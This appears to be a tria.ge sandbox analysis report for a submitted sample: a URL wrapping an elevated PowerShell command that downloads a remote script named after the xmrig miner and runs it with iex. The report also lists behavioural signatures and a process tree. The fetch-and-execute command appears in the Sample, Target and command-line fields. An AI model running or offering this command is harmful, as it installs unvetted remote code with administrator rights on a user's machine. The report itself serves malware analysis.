Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 133s
max time network: 134s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 27/06/2024, 01:39
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win7-20231129-en
General
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
Access Token Manipulation: Create Process with Token (1 TTPs, 1 IoCs)
pid 1848, process iexplore.exe
Modifies Internet Explorer settings
Registry keys created and values set by iexplore.exe under \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer (per-key IoC listing omitted)
Suspicious use of FindShellTrayWindow (1 IoCs)
pid 1848, process iexplore.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
pid 1848, process iexplore.exe
pid 1848, process iexplore.exe
pid 1196, process IEXPLORE.EXE
pid 1196, process IEXPLORE.EXE
pid 1196, process IEXPLORE.EXE
pid 1196, process IEXPLORE.EXE

Suspicious use of WriteProcessMemory (4 IoCs)
description: PID 1848 wrote to memory of 1196 | pid 1848 | process iexplore.exe | procid_target 28
description: PID 1848 wrote to memory of 1196 | pid 1848 | process iexplore.exe | procid_target 28
description: PID 1848 wrote to memory of 1196 | pid 1848 | process iexplore.exe | procid_target 28
description: PID 1848 wrote to memory of 1196 | pid 1848 | process iexplore.exe | procid_target 28
Processes
1. C:\Program Files\Internet Explorer\iexplore.exe
   Command line: "C:\Program Files\Internet Explorer\iexplore.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
   PID: 1848
   - Access Token Manipulation: Create Process with Token
   - Modifies Internet Explorer settings
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1848 CREDAT:275457 /prefetch:2
      PID: 1196
      - Modifies Internet Explorer settings
      - Suspicious use of SetWindowsHookEx

1. C:\Windows\explorer.exe
   Command line: "C:\Windows\explorer.exe"
   PID: 2188

1. C:\Windows\System32\control.exe
   Command line: "C:\Windows\System32\control.exe" SYSTEM
   PID: 2404

1. C:\Windows\SysWOW64\DllHost.exe
   Command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
   PID: 1364
Network
MITRE ATT&CK Enterprise v15
Downloads